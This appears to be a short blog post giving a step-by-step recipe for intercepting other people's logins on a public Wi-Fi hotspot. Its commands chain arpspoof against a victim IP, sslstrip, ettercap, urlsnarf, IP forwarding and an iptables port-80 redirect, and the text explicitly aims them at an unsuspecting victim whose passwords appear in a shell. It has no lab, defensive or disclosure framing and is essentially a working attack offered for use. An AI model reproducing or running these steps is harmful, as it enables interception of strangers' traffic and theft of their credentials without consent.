1.Working Wireless Lan Card and connected to any hotspot
2. SSLStrip installted3. Etthercap installed
4.urlsniffer installed
5. aprspoof installed All will come pre-installed on BT 5
Step 1: In the first step we have to make sure that we are connected to a Wifi network and scan the available online node by using any network scanning software
Step 2: One we know find the victim run this command and keep it running on the shell. This command will spoof the ARP request towards your PC arpspoof -i wlan0 -t 192.168.2.149 192.168.2.1 Explanation: aprspoof -i Network interface card IP-OF-VICTIM ROUTER-IP-ADDRESS Where -i switch is to define the interface in my case I used wireless so its wlan0 if you are trying it over ethernet it would be your appropiate eth0 or eth1 devices if you have more then one network interface card
Step 3: Now open another shell and execute the sslstrip Note: If you are running BackTrack 5 then goto /pentest/web/sslstrip ./sslstrip -a -k -f Keep this shell open and do not close
Step 4: ettercap -Tq -L etterlogs -i wlan0 Also do not close this shell and keep it open. this is the shell where you will actually see the password
Step 5: Open another shell and run this command urlsnarf -v -i wlan0 This command will show you real time as your victim surf the internet
Step 6: Enable IP Forwarding on your linux box execute the below command echo 1 > /proc/sys/net/ipv4/ip_forward
Step 7: As a final step we have to create this below rule into IP Tables iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000 Once all is done you will start seeing victim internet browing in the window that you opened in Step 5. Be patient till you see the customer logging into a website. If he is already logged in you will not be able to get his password.
credit to Gerti1
No comments:
Post a Comment